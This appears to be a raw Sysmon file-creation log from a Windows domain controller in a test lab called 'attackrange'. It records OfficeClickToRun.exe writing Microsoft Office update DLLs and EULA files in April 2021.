11241100x800000000000000064557Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-math-l1-1-0.dll2021-04-20 14:54:15.409 11241100x800000000000000064556Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msmgdsrv.dll2021-04-20 14:54:15.409 11241100x800000000000000064555Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-locale-l1-1-0.dll2021-04-20 14:54:15.409 11241100x800000000000000064554Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-heap-l1-1-0.dll2021-04-20 14:54:15.409 11241100x800000000000000064553Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-convert-l1-1-0.dll2021-04-20 14:54:15.409 11241100x800000000000000064552Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingChromeHook.dll2021-04-20 14:54:15.409 11241100x800000000000000064551Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ClientConfiguration.dll2021-04-20 14:54:15.409 11241100x800000000000000064550Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.AuditItems.dll2021-04-20 14:54:15.409 11241100x800000000000000064549Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AutoHelper.dll2021-04-20 14:54:15.409 11241100x800000000000000064548Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\vcruntime140.dll2021-04-20 14:54:15.409 11241100x800000000000000064547Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\AppSharingHookController.exe2021-04-20 14:54:15.409 11241100x800000000000000064546Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\GROOVEEX.DLL2021-04-20 14:54:15.409 11241100x800000000000000064545Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-string-l1-1-0.dll2021-04-20 14:54:15.409 11241100x800000000000000064544Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOSB.DLL2021-04-20 14:54:15.331 11241100x800000000000000064543Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONLNTCOMLIB.DLL2021-04-20 14:54:15.284 11241100x800000000000000064542Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONBttnIELinkedNotes.dll2021-04-20 14:54:15.284 11241100x800000000000000064541Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\ONBttnIE.dll2021-04-20 14:54:15.284 11241100x800000000000000064540Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\OCHelper.dll2021-04-20 14:54:15.284 11241100x800000000000000064539Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NPSPWRAP.DLL2021-04-20 14:54:15.284 11241100x800000000000000064538Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.284{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\NAMECONTROLPROXY.DLL2021-04-20 14:54:15.268 11241100x800000000000000064537Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\mfc140u.dll2021-04-20 14:54:15.268 11241100x800000000000000064536Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMeetingReqSendNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064535Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMeetingReqReadNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064534Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMailReadNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064533Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookMailNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064532Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookApptNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\OutlookAddrNaiveBayesCommandRanker.txt2021-04-20 14:54:15.268 11241100x800000000000000064530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\MSQRY32.CHM2021-04-20 14:54:15.268 11241100x800000000000000064529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\msvcp140.dll2021-04-20 14:54:15.268 11241100x800000000000000064528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\vccorlib140.dll2021-04-20 14:54:15.268 11241100x800000000000000064527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.268{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfcm140u.dll2021-04-20 14:54:15.268 11241100x800000000000000064526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\msvcp140_1.dll2021-04-20 14:54:15.253 11241100x800000000000000064525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\mfc140u.dll2021-04-20 14:54:15.253 11241100x800000000000000064524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\SystemX86\vcruntime140.dll2021-04-20 14:54:15.253 11241100x800000000000000064523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\msotelemetryintl.dll2021-04-20 14:54:15.253 11241100x800000000000000064522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\concrt140.dll2021-04-20 14:54:15.253 11241100x800000000000000064521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.253{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\IFDPINTL.DLL2021-04-20 14:54:15.253 11241100x800000000000000064520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp140.dll2021-04-20 14:54:15.221 11241100x800000000000000064519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfcm140u.dll2021-04-20 14:54:15.221 11241100x800000000000000064518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\msvcp140_1.dll2021-04-20 14:54:15.221 11241100x800000000000000064517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\mfc140u.dll2021-04-20 14:54:15.221 11241100x800000000000000064516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.221{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\GRLEX.DLL2021-04-20 14:54:15.221 11241100x800000000000000064515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ENVELOPR.DLL2021-04-20 14:54:15.206 11241100x800000000000000064514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\EntityPickerIntl.dll2021-04-20 14:54:15.206 11241100x800000000000000064513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientVolumeLicense2019_eula.txt2021-04-20 14:54:15.206 11241100x800000000000000064512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\BCSRuntimeRes.dll2021-04-20 14:54:15.206 11241100x800000000000000064511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\System\vccorlib140.dll2021-04-20 14:54:15.206 11241100x800000000000000064510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub_M365_eula.txt2021-04-20 14:54:15.206 11241100x800000000000000064509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.206{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub_eula.txt2021-04-20 14:54:15.206 11241100x800000000000000064508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\OLMAPI32.DLL2021-04-20 14:54:15.190 11241100x800000000000000064507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\ColleagueImport.dll2021-04-20 14:54:15.190 11241100x800000000000000064506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ADDINS\UmOutlookAddin.dll2021-04-20 14:54:15.190 11241100x800000000000000064505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.190{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPRESOURCES.DLL2021-04-20 14:54:15.190 11241100x800000000000000064504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\IGX.DLL2021-04-20 14:54:15.175 11241100x800000000000000064503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientSub2019_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\AccessRuntime2019_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientOSub_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientOSub2019_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientLangPack_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientLangPack2019_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientPreview_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\1033\ClientARMRefer_eula.txt2021-04-20 14:54:15.175 11241100x800000000000000064495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:15.175{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 